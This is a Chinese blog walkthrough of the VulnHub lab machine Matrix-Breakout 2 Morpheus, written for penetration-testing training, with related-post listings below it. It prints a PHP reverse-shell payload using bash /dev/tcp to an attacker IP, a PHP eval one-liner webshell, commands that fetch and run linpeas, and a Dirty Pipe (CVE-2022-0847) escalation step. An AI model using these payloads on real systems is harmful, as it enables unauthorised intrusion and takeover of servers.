vulnhub靶场渗透实战15-matrix-breakout-2-morpheus

已于 2023-02-08 17:56:54 修改
阅读量918 收藏 8
点赞数 2
分类专栏: VulnHub靶场 文章标签: 安全 web安全 mysql 数据库 网络安全
于 2023-02-08 17:55:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60329350/article/details/128900640
版权

靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。

 

靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

网络模式:桥接。

 一:信息收集

1:主机发现。端口发现。

2;访问端口信息。三位一体不会玩。

 3;目录爆破一下,继续寻找。

4;文件爆破一下。

ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

 5;输入消息的地方好像有bug。试试。发布的东西被记录到txt文件里了。

 二:漏洞利用。

1;burp抓包看一下数据包,

这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。访问创建的文件。

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>

 2;监听成功。

 3;发现一个txt的文件。提示,和一张图片。

www-data@morpheus:/$ ls -al

 要找到cypher的密码!!

 4;访问一下图片,把图片复制到kali里面去,可能藏着东西喔。

复制不了的,也可以下载。

wget http://192.168.1.35/.cypher-neo.png

binwalk -w cypher-neo.png

binwalk -e cypher-neo.png --run-as=root   
换这个工具查看隐藏信息,然后提取出来,然后提示我们加--run-as=root,之后目录下会多个目录,

 zlib这个提取不太会,就换个方式吧!等哪天有大佬从这儿解了,我再来更新学习吧!

杂项 - zlib - Ainsliaea - 博客园

CTF 隐写 关于zlib的解压 2018全国大学生信息安全竞赛 picture_never疯的博客-CSDN博客_ctf zlib文件

 5:传信息收集的工具上去,

python3 -m http.server 8000
wget http://192.168.1.34:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

 这里我们用这个:mirrors / r1is / CVE-2022-0847 · GitCode

三:补充。

 到这的话我们就提权成功了,有两个用户名,前面让我们找到cypher的密码,zlib不会提取,试试爆破!家目录下有个flag。

python3 -c 'import pty; pty.spawn("/bin/bash")'  把权限变成交互式shell。

两个用户密码,爆破的话,没爆出来! 

 

  也可以写个马,连接蚁剑看看文件里面有没有什么信息。

<?php eval(@$_POST['password']);?>

 四:总结

1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。

2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。

3;遇到不是很懂的程序,投机取巧一下,利用漏洞提权。

学安全的杨咩咩
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
matrix-breakout-2-morpheus靶机渗透笔记
qq_60600840的博客
08-09 400
matrix-breakout-2-morpheus靶机、安全、渗透、靶机
breakout-frontend:网络前端
05-14
使用docker启动mongodb: docker run --name breakout-mongo -p "27017:27017" -d mongo 可选:启动Breakout-backend实例(需要更多文档) 运行npm i以安装节点软件包(适用于npm版本6和节点版本12) 运行npm ...
Vulnhub】之matrix-breakout-2-morpheus
zg_111的博客
03-29 1809
上传成功后,我们通过蚁剑连接成功,并且在根目录下找到了FLAG.txt文件,并在文件中发现了flag,提示要找到 cypher 的密码,还提示 80 端口有一个隐藏图片 /.cypher-neo.png。使用burpsuite工具抓包可知,message参数为上传的内容,file参数为内容传入的文件,改变file变量可以直接对靶机文件修改,能随意创建文件。根据扫描的结果发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131。让我们先来信息收集一波吧!
Linux提权一
最新发布
zyw268的博客
06-01 441
复现环境:https://www.vulnhub.com/entry/darkhole-1,724/复现环境:https://www.vulnhub.com/entry/lampiao-1,249/#Linux系统提权-Web&内核溢出-DirtyPipe。获取到Web权限在Linux服务器上时进行的内核漏洞提权。#Linux系统提权-Web&内核溢出-Pwnkit。#Linux系统提权-Web&内核溢出-Dcow。重置管理密码-上传1.phtml-反弹MSF。扫描发现-抓包分析-文件写入-反弹MSF。
Vulnhub靶机:MATRIX-BREAKOUT_ 2 MORPHEUS
LainWith的博客
01-10 1489
(此系列共1台)发布日期:2022 年 7 月 11 日难度:中级运行环境:Virtualbox运行失败,VMware运行成功目标:取得 root 权限主机发现端口扫描+漏洞扫描ftp探测分析计划任务日志内核提权。
vulnhub靶机渗透 matrix-breakout-2-morpheus
RestoreJustice的博客
03-19 468
webshell那一段,一开始以为是扫目录把靶机扫崩溃了,后来发现靶机有防火墙。之前一直写不了,可能是这个原因。
Vulnhub靶场matrix-breakout-2-morpheus
qq_69775412的博客
10-17 573
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
Breakout-phaser:PhaserJS的游戏突破
02-04
"Breakout-phaser"项目,正是利用PhaserJS实现的经典游戏"打砖块"(Breakout)的一个实例,它充分展示了PhaserJS在构建2D游戏时的强大潜力。 1. PhaserJS框架介绍: PhaserJS是一个免费、开源的JavaScript库,专为...
breakout-js:使用Canvas和JavaScript实现经典突破游戏
05-28
Breakout-js原始的灵魂ClássicoJogo Breakout工具和Canvas e JavaScript。Licença 麻省理工学院执照版权所有(c)2021 Allyson Jeronimo 特此免费授予获得此软件和相关文档文件(“软件”)副本的任何人无限制地...
Brick-Breakout-game:带JavaScript的Brick Breakout游戏
04-29
破砖游戏 ...使用基本javascript和CSS开发的Brick Breakout游戏。 规则 游戏为用户提供3条生命,其动机是打破所有障碍。 可以在使用键盘箭头键控制的球拍的帮助下将球拍打。 愿你赢得这场比赛! 开发玩!!
Pantsu-Breakout-Game:Phaser网络游戏
02-05
Pantsu突破游戏 移相器网页游戏 您可以在上播放最新的最低可行产品,或者在上播放最新版本... 因此,由于我不想重构当前编写的所有内容,因此我将停止Pantsu Breakout Game的开发,而将其保留在最低可行的产品编号5上。
vulnhub靶场1:matrix-breakout-2-morpheus
Genarior的专栏
02-22 593
vulnhub - matrix-breakout-2-morpheus靶场记录
vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1253
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
matrix-breakout-2-morpheus靶场记录
weixin_46411728的博客
02-14 1153
matrix-breakout-2-morpheus靶场记录
vulnhub靶场Matrix-Breakout 2 Morpheus
qq_58091216的博客
01-31 1293
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
Vulnhub: Matrix-Breakout: 2 Morpheus靶机
qq_43884092的博客
06-11 384
burp改包写入webshell,CVE-2022-0847提权
Matrix Breakout:2 Morpheus(靶机详细渗透测试过程记录)
m0_63028223的博客
07-12 621
php伪协议读文件,msf提权
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 784
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 4084
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值